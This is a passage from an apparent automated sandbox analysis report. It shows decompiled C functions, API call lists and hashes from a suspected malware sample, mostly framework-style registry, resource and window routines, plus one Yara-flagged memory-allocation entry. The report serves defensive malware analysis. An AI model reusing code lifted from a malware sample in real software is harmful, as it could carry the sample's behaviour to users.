                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window
                  • String ID:
                  • API String ID: 2353593579-0
                  • Opcode ID: 7410f4b12793f2ec231ad1daf2c8ce28c1818b0d738aaaf39ca56126d1e55c8e
                  • Instruction ID: b27234d353631adc336677cf3729c0b56e1793a16e94a8337e953a23c5fb5991
                  • Opcode Fuzzy Hash: 7410f4b12793f2ec231ad1daf2c8ce28c1818b0d738aaaf39ca56126d1e55c8e
                  • Instruction Fuzzy Hash: 2F01D77600151ABBCF226F969C04F9F3A26BF49351F454436FA10615A0C73ACA26EFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E00427206(void* __esi, void* _a4, CHAR* _a8, char* _a12) {
                  				void* __ebp;
                  				long _t13;
                  				long _t14;
                  				long _t17;
                  				long _t18;
                  				signed int _t20;
                  				void* _t23;
                  				void* _t24;
                  				void* _t25;
                  				long _t28;
                  
                  				_t29 = _a12;
                  				if(_a12 != 0) {
                  					_push(__esi);
                  					_push( &_a4);
                  					_push(_a4);
                  					_push(0x80000000); // executed
                  					_t13 = E0041FF90(_t23, _t24, _t25, __esi, __eflags); // executed
                  					__eflags = _t13;
                  					if(_t13 != 0) {
                  						L6:
                  						_t14 = 0;
                  						__eflags = 0;
                  						L7:
                  						return _t14;
                  					}
                  					_t17 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1); // executed
                  					_t28 = _t17;
                  					_t18 = RegCloseKey(_a4);
                  					__eflags = _t18;
                  					if(_t18 != 0) {
                  						goto L6;
                  					}
                  					__eflags = _t28;
                  					if(_t28 != 0) {
                  						goto L6;
                  					}
                  					_t14 = _t18 + 1;
                  					goto L7;
                  				}
                  				_push(lstrlenA(_a8));
                  				_push(_a8);
                  				_push(1);
                  				_push(_a4);
                  				_push(0x80000000); // executed
                  				_t20 = E004200A3(_t23, _t24, _t25, __esi, _t29); // executed
                  				asm("sbb eax, eax");
                  				return  ~_t20 + 1;
                  			}

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 004200A3: __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 004200A3: RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                  • lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                  • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                  • RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Valuelstrlen$CloseH_prolog3
                  • String ID:
                  • API String ID: 3141881944-0
                  • Opcode ID: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction ID: ccfb3bf29ba8f107e27247e9e6faae6128845c626efc22bed24505a1ddd35dde
                  • Opcode Fuzzy Hash: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction Fuzzy Hash: BE018F36604228FFEF111FA1EC04FEA3B69FB04754F508465FE19D9060D77589619BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00417E26(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t9;
                  				void* _t14;
                  				void* _t18;
                  				void* _t19;
                  				void* _t20;
                  				void* _t22;
                  				struct HINSTANCE__* _t23;
                  
                  				_t18 = __edx;
                  				_push(__ecx);
                  				_push(_t22);
                  				_push(_t19);
                  				_v8 = __ecx;
                  				_t14 = 0;
                  				_t23 =  *(E0041F363(0, _t19, _t22, __eflags) + 0xc);
                  				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
                  				_t27 = _t20;
                  				if(_t20 != 0) {
                  					_t14 = LockResource(_t20);
                  				}
                  				_t9 = E00417A77(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23); // executed
                  				FreeResource(_t20);
                  				return _t9;
                  			}

                  APIs
                  • FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                  • LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                  • LockResource.KERNEL32(00000000), ref: 00417E57
                  • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction ID: 1e18d01870298c609716ab9c137838f91a6cabb118689048c7d05f5a7d7d13e7
                  • Opcode Fuzzy Hash: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction Fuzzy Hash: D1F0543B500214BBC7025FE79C48D9FBBBDEF86661B01406AFA0593251DA74DD0187A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E0041EB0A(intOrPtr __ebx, void* __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				short _v10;
                  				short _v12;
                  				short _v532;
                  				struct HINSTANCE__* _v536;
                  				intOrPtr _v544;
                  				WCHAR* _v556;
                  				intOrPtr _v560;
                  				char _v564;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t25;
                  				intOrPtr _t36;
                  				intOrPtr _t40;
                  				struct HINSTANCE__* _t42;
                  				intOrPtr _t43;
                  				void* _t45;
                  				intOrPtr _t46;
                  				signed int _t50;
                  
                  				_t40 = __edx;
                  				_t36 = __ebx;
                  				_t48 = _t50;
                  				_t25 =  *0x463404; // 0x18eab29f
                  				_v8 = _t25 ^ _t50;
                  				_t45 = __ecx;
                  				E0041EA0E(__ecx);
                  				_t42 =  *(__ecx + 8);
                  				_v10 = 0;
                  				_v12 = 0;
                  				if(GetModuleFileNameW(_t42,  &_v532, 0x105) != 0) {
                  					if(_v12 == 0) {
                  						_v556 =  &_v532;
                  						_push( &_v564);
                  						_v564 = 0x20;
                  						_v560 = 0x88;
                  						_v544 = 2;
                  						_v536 = _t42;
                  						_t30 = E0041EA7C(); // executed
                  						 *(_t45 + 0x80) = _t30;
                  						if(_t30 == 0xffffffff) {
                  							_push( &_v564);
                  							_v544 = 3;
                  							_t30 = E0041EA7C(); // executed
                  							 *(_t45 + 0x80) = _t30;
                  						}
                  						if( *(_t45 + 0x80) == 0xffffffff) {
                  							_push( &_v564);
                  							_v544 = 1;
                  							_t30 = E0041EA7C(); // executed
                  							 *(_t45 + 0x80) = _t30;
                  							if(_t30 == 0xffffffff) {
                  								 *(_t45 + 0x80) =  *(_t45 + 0x80) & 0x00000000;
                  							}
                  						}
                  					} else {
                  						SetLastError(0x6f);
                  					}
                  				}
                  				_pop(_t43);
                  				_pop(_t46);
                  				return E00430650(_t30, _t36, _v8 ^ _t48, _t40, _t43, _t46);
                  			}

                  APIs
                    • Part of subcall function 0041EA0E: GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                  • SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                  • String ID:
                  • API String ID: 2524245154-3916222277
                  • Opcode ID: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction ID: 2d8284ff9693ed2a28cfc80b954e748d0848247ed859874abad0443c4c525062
                  • Opcode Fuzzy Hash: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction Fuzzy Hash: 252180749002289EDB20DF76C8487EEB7B4BF18324F10469ED469D3280DB789A85DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00420AEC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t17;
                  				intOrPtr _t19;
                  				intOrPtr _t21;
                  				intOrPtr _t24;
                  				intOrPtr _t25;
                  				intOrPtr* _t30;
                  				void* _t31;
                  				intOrPtr _t33;
                  
                  				_t27 = __edi;
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044BF03, __ebx, __edi, __esi);
                  				_t30 = __ecx;
                  				_t33 =  *((intOrPtr*)(_t31 + 8));
                  				_t34 = _t33 == 0;
                  				if(_t33 == 0) {
                  					L1:
                  					E00406436(_t22, _t23, _t27, _t30, _t34);
                  				}
                  				if( *_t30 == 0) {
                  					_t23 =  *0x466564; // 0x466568
                  					if(_t23 != 0) {
                  						L5:
                  						_t19 = E004206EA(_t23); // executed
                  						 *_t30 = _t19;
                  						if(_t19 == 0) {
                  							goto L1;
                  						}
                  					} else {
                  						 *((intOrPtr*)(_t31 - 0x10)) = 0x466568;
                  						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                  						_t21 = E00420802(0x466568);
                  						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
                  						_t23 = _t21;
                  						 *0x466564 = _t21;
                  						if(_t21 == 0) {
                  							goto L1;
                  						} else {
                  							goto L5;
                  						}
                  					}
                  				}
                  				_t24 =  *0x466564; // 0x466568
                  				_t28 = E0042055C(_t24,  *_t30);
                  				_t39 = _t28;
                  				if(_t28 == 0) {
                  					_t17 =  *((intOrPtr*)(_t31 + 8))();
                  					_t25 =  *0x466564; // 0x466568
                  					E004208A9(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
                  				}
                  				return E00431B73(_t28);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8Throw
                  • String ID: heF$heF
                  • API String ID: 2489616738-1142830922
                  • Opcode ID: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction ID: ab974ef05ecb18432cb7f708e95ae9439a66807c8b60da0ae834fd07ff38b2a5
                  • Opcode Fuzzy Hash: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction Fuzzy Hash: 560152307002229BDB24EF75A86262A7AE29B40398F51403EE442C73A2EB78D841C75D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E004200A3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t21;
                  				void* _t25;
                  				void* _t28;
                  				void* _t42;
                  				void* _t45;
                  
                  				_t45 = __eflags;
                  				_t38 = __edx;
                  				_push(0);
                  				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
                  				_push( *(_t42 + 0xc));
                  				E00406039(__ebx, _t42 + 0xc, __edx, __edi, __esi, _t45);
                  				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                  				if( *(_t42 + 8) == 0x80000000) {
                  					_t25 = E0041EC3D();
                  					_t47 = _t25 - 1;
                  					if(_t25 == 1) {
                  						_push(_t42 + 0xc);
                  						_push("Software\\Classes\\");
                  						_push(_t42 + 8);
                  						_t28 = E004168AB(__ebx, __edi, __esi, _t47);
                  						 *(_t42 - 4) = 1;
                  						E004056C2(__ebx, _t42 + 0xc, _t28);
                  						E004010B0( *(_t42 + 8) + 0xfffffff0, _t38);
                  						 *(_t42 + 8) = 0x80000001;
                  					}
                  				}
                  				_t21 = RegSetValueA( *(_t42 + 8),  *(_t42 + 0xc),  *(_t42 + 0x10),  *(_t42 + 0x14),  *(_t42 + 0x18)); // executed
                  				E004010B0( &(( *(_t42 + 0xc))[0xfffffffffffffff0]), _t38);
                  				return E00431B73(_t21);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Value
                  • String ID: Software\Classes\
                  • API String ID: 2677715340-1121929649
                  • Opcode ID: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction ID: 36d8d2347135d1014e61bc86d482cac2e80b6f69d22420b9f2c8f0bbc59bcd91
                  • Opcode Fuzzy Hash: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction Fuzzy Hash: 7301713550010CABCF01EF61C851BDE3B65EF04368F10C11AFD295A2A2DB7ADAA4CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E00420018(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t20;
                  				void* _t24;
                  				void* _t27;
                  				void* _t41;
                  				void* _t44;
                  
                  				_t44 = __eflags;
                  				_t37 = __edx;
                  				_push(0);
                  				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
                  				_push( *(_t41 + 0xc));
                  				E00406039(__ebx, _t41 + 0xc, __edx, __edi, __esi, _t44);
                  				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                  				if( *(_t41 + 8) == 0x80000000) {
                  					_t24 = E0041EC3D();
                  					_t46 = _t24 - 1;
                  					if(_t24 == 1) {
                  						_push(_t41 + 0xc);
                  						_push("Software\\Classes\\");
                  						_push(_t41 + 8);
                  						_t27 = E004168AB(__ebx, __edi, __esi, _t46);
                  						 *(_t41 - 4) = 1;
                  						E004056C2(__ebx, _t41 + 0xc, _t27);
                  						E004010B0( *(_t41 + 8) + 0xfffffff0, _t37);
                  						 *(_t41 + 8) = 0x80000001;
                  					}
                  				}
                  				_t20 = RegQueryValueA( *(_t41 + 8),  *(_t41 + 0xc),  *(_t41 + 0x10),  *(_t41 + 0x14)); // executed
                  				E004010B0( &(( *(_t41 + 0xc))[0xfffffffffffffff0]), _t37);
                  				return E00431B73(_t20);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042001F
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegQueryValueA.ADVAPI32(?,?,?,?), ref: 00420086
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$QueryValue
                  • String ID: Software\Classes\
                  • API String ID: 3057600494-1121929649
                  • Opcode ID: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction ID: 6bbe67646f65ca86f3e8ed88bc76af1affd6d011764a7e200061fff5045a4722
                  • Opcode Fuzzy Hash: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction Fuzzy Hash: 15018F31500108ABCF11EF61CC51BDE3B24EF00368F10C51AFD295A2A2DB7ACA94CB9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E0041FF90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t19;
                  				void* _t23;
                  				void* _t26;
                  				void* _t40;
                  				void* _t43;
                  
                  				_t43 = __eflags;
                  				_t36 = __edx;
                  				_push(0);
                  				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
                  				_push( *(_t40 + 0xc));
                  				E00406039(__ebx, _t40 + 0xc, __edx, __edi, __esi, _t43);
                  				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                  				if( *(_t40 + 8) == 0x80000000) {
                  					_t23 = E0041EC3D();
                  					_t45 = _t23 - 1;
                  					if(_t23 == 1) {
                  						_push(_t40 + 0xc);
                  						_push("Software\\Classes\\");
                  						_push(_t40 + 8);
                  						_t26 = E004168AB(__ebx, __edi, __esi, _t45);
                  						 *(_t40 - 4) = 1;
                  						E004056C2(__ebx, _t40 + 0xc, _t26);
                  						E004010B0( *(_t40 + 8) + 0xfffffff0, _t36);
                  						 *(_t40 + 8) = 0x80000001;
                  					}
                  				}
                  				_t19 = RegCreateKeyA( *(_t40 + 8),  *(_t40 + 0xc),  *(_t40 + 0x10)); // executed
                  				E004010B0( &(( *(_t40 + 0xc))[0xfffffffffffffff0]), _t36);
                  				return E00431B73(_t19);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041FF97
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegCreateKeyA.ADVAPI32(80000000,?,00000000), ref: 0041FFFB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Create
                  • String ID: Software\Classes\
                  • API String ID: 1257125548-1121929649
                  • Opcode ID: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction ID: ad4cc70f86dcb154f4fc015380cce98aa4d1ccfaf3cac0b944be5d41c75bc983
                  • Opcode Fuzzy Hash: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction Fuzzy Hash: F0016236400108ABCF11EF65C851BDE3B24EF10368F10C52FFD295A2A2DB79DA95CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,022F0005), ref: 022F00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,022F0005), ref: 022F0113
                  Memory Dump Source
                  • Source File: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 895abc098ca0bcaf11b762a7dbd5cd21e7295f8514ba7fbe2c37cc5ccf11011f
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: DDE1AF71A183068FDB64CF99C84072AF3E1BF84318F08453DEA959B64AE774EA45CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00404F72(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, struct HWND__* _a20, char _a24) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				void* _v40;
                  				signed int _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				signed int _v80;
                  				intOrPtr _v84;
                  				char _v88;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr* _t70;
                  				long _t91;
                  				signed int _t92;
                  				void* _t104;
                  				void* _t105;
                  				intOrPtr _t111;
                  				intOrPtr _t118;
                  				intOrPtr* _t119;
                  				intOrPtr* _t120;
                  
                  				_t109 = __ecx;
                  				_t120 = _a20;
                  				_t119 = __ecx;
                  				if(_t120 != 0) {
                  					L4:
                  					 *((intOrPtr*)( *_t120 + 0x150))(1);
                  					_v44 = _v44 & 0x00000000;
                  					_v48 = _a4;
                  					_v52 = _a8;
                  					_v56 = _a12;
                  					_t70 = _a16;
                  					_t111 =  *_t70;
                  					_t118 =  *((intOrPtr*)(_t70 + 4));
                  					_v60 = _t111;
                  					_v64 = _t118;
                  					_v68 =  *((intOrPtr*)(_t70 + 8)) - _t111;
                  					_v72 =  *((intOrPtr*)(_t70 + 0xc)) - _t118;
                  					_v80 = _v80 & 0x00000000;
                  					_v76 =  *((intOrPtr*)(_t120 + 0x20));
                  					_v84 =  *((intOrPtr*)(E0041F363( *((intOrPtr*)(_t70 + 8)) - _t111, _t119, _t120, _t123) + 8));
                  					_v88 = _a24;
                  					_push( &_v88);
                  					if( *((intOrPtr*)( *_t119 + 0x64))() != 0) {
                  						_v40 = _v48;
                  						_v36 = _v52;
                  						_v32 = _v84;
                  						_v28 = _v60;
                  						_v24 = _v64;
                  						_v20 = _v68;
                  						_v16 = _v72;
                  						_v12 = _v56 & 0xeeffffff;
                  						_v8 = _v88;
                  						E00410F0D(__eflags, _t119);
                  						_t91 = SendMessageA( *(_t120 + 0xe8), 0x220, 0,  &_v40); // executed
                  						_a20 = _t91;
                  						_t92 = E0040EEF5(__eflags);
                  						__eflags = _t92;
                  						if(_t92 == 0) {
                  							 *((intOrPtr*)( *_t119 + 0x11c))();
                  						}
                  						__eflags = _a20;
                  						if(_a20 == 0) {
                  							L6:
                  							return 0;
                  						} else {
                  							__eflags = _v56 & 0x10000000;
                  							if((_v56 & 0x10000000) != 0) {
                  								BringWindowToTop(_a20);
                  								__eflags = _v56 & 0x20000000;
                  								if((_v56 & 0x20000000) == 0) {
                  									__eflags = _v56 & 0x01000000;
                  									if((_v56 & 0x01000000) == 0) {
                  										_push(1);
                  									} else {
                  										_push(3);
                  									}
                  								} else {
                  									_push(2);
                  								}
                  								E00412C34(_t119);
                  								E004049F6(_t120, _t119);
                  								SendMessageA( *(_t120 + 0xe8), 0x234, 0, 0);
                  							}
                  							__eflags = 1;
                  							return 1;
                  						}
                  					}
                  					 *((intOrPtr*)( *_t119 + 0x11c))();
                  					goto L6;
                  				}
                  				_t104 = E00415AD9();
                  				_t122 = _t104;
                  				if(_t104 != 0) {
                  					L3:
                  					_t120 =  *((intOrPtr*)(_t104 + 0x20));
                  					_t123 = _t120;
                  					if(_t120 == 0) {
                  						goto L2;
                  					}
                  					goto L4;
                  				}
                  				L2:
                  				_t104 = E00406436(_t105, _t109, _t119, _t120, _t122);
                  				goto L3;
                  			}

                  APIs
                  • SendMessageA.USER32(?,00000220,00000000,?), ref: 0040506E
                  • BringWindowToTop.USER32 ref: 00405098
                  • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004050D8
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$BringException@8H_prolog3ThrowWindow
                  • String ID:
                  • API String ID: 306136782-0
                  • Opcode ID: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction ID: 6dae8c16407d9ac781d226e3f0a0722bfa2389bcaa109963fa7a45136cf591de
                  • Opcode Fuzzy Hash: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction Fuzzy Hash: 4251E474A012099FDB10DFA9C985BAEBBF5FF48304F10402AF909EB390D778A9418F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00402500(char** __ecx, struct HINSTANCE__* _a4, unsigned int _a8) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				void* __ebx;
                  				void* __edi;
                  				void* __ebp;
                  				int _t28;
                  				char _t35;
                  				char _t38;
                  				char _t41;
                  				char* _t45;
                  				char** _t49;
                  				char* _t50;
                  				char* _t53;
                  				signed int _t54;
                  				signed short* _t67;
                  				void* _t69;
                  				int _t72;
                  				intOrPtr _t73;
                  				short* _t75;
                  				intOrPtr _t77;
                  				void* _t78;
                  				void* _t79;
                  
                  				_t71 = _a8;
                  				_t65 = _a4;
                  				_t49 = __ecx;
                  				if(FindResourceA(_a4, (_a8 >> 0x00000004) + 0x00000001 & 0x0000ffff, 6) == 0) {
                  					L2:
                  					return 0;
                  				} else {
                  					_t67 = E004019E0(_t65, _t24, _t71);
                  					_t79 = _t78 + 0xc;
                  					if(_t67 != 0) {
                  						_t3 =  &(_t67[1]); // 0x2
                  						_t75 = _t3;
                  						_t28 = WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, 0, 0, 0, 0); // executed
                  						_t72 = _t28;
